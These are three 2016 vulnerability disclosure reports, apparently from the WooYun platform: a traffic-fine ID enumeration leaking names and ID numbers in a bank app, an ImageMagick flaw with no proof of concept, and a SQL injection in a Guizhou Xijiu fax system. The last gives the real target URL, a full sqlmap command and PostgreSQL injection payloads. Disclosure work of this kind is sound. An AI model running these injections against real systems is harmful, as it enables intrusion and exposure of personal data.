漏洞详情披露状态： 2016-06-15： 细节已通知厂商并且等待厂商处理中2016-06-15： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-06-20： 厂商已经主动忽略漏洞，细节向公众公开简要描述：缴费过程中的偶遇...详细说明：被贴罚单了，去网上缴费，然后打开工商银行手机端，e缴费。交通罚款输入罚单编号可以遍历罚单号，获得用户姓名及身份证号码，我很懒，此处就不去遍历了漏洞证明：  修复方案：虽然不是什么大问题，感觉还是挺别扭的，自己的姓名和身份证号码不想外泄。版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-06-20 13:50厂商回复： 最新状态：暂无

漏洞详情披露状态： 2016-05-05： 细节已通知厂商并且等待厂商处理中2016-05-10： 厂商已经确认，细节仅向厂商公开2016-05-20： 细节向核心白帽子及相关领域专家公开2016-05-30： 细节向普通白帽子公开2016-06-09： 细节向实习白帽子公开2016-06-24： 细节向公众公开简要描述： 详细说明： imagemagick攻击，自行测试吧漏洞证明：poc就不放出来了，你懂的修复方案： 版权声明：转载请注明来源 殺器王子@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-05-10 09:57厂商回复：非常感谢您的报告，已经有人在tsrc平台报告过，此问题我们已经第一时间紧急处理。感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，最新状态：暂无

漏洞详情披露状态： 2016-04-25： 细节已通知厂商并且等待厂商处理中2016-04-25： 厂商已经确认，细节仅向厂商公开2016-05-05： 细节向核心白帽子及相关领域专家公开2016-05-15： 细节向普通白帽子公开2016-05-25： 细节向实习白帽子公开2016-06-09： 细节向公众公开简要描述：茅台电商某系统存在SQL注入漏洞详细说明：存在漏洞系统，贵州习酒网络传真系统http://gzxijiu.cn:100/faxserver/注入点http://gzxijiu.cn:100/faxserver/JSActionServlet注入参数,username--data "username=13900001111&req=call&callname=forgetPassWord"漏洞证明： code 区域python sqlmap.py -u "http://gzxijiu.cn:100/faxserver/JSActionServlet" --data "username=13900001111&req=call&callname=forgetPassWord"code 区域--- Parameter: username (POST) Type: stacked queries Title: PostgreSQL > 8.1 stacked queries Payload: username=13900001111'; SELECT PG_SLEEP(5)--&req=call&callname=forgetPassWord Type: AND/OR time-based blind Title: PostgreSQL > 8.1 AND time-based blind Payload: username=13900001111' AND 6678=(SELECT 6678 FROM PG_SLEEP(5)) AND 'ErBJ'='ErBJ&req=call&callname=forgetPassWord --- [10:35:10] [INFO] the back-end DBMS is PostgreSQL 修复方案：强制类型转换，或不对互联网开放版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-04-25 10:42厂商回复：感谢您的反馈，我们将尽快修复。最新状态：暂无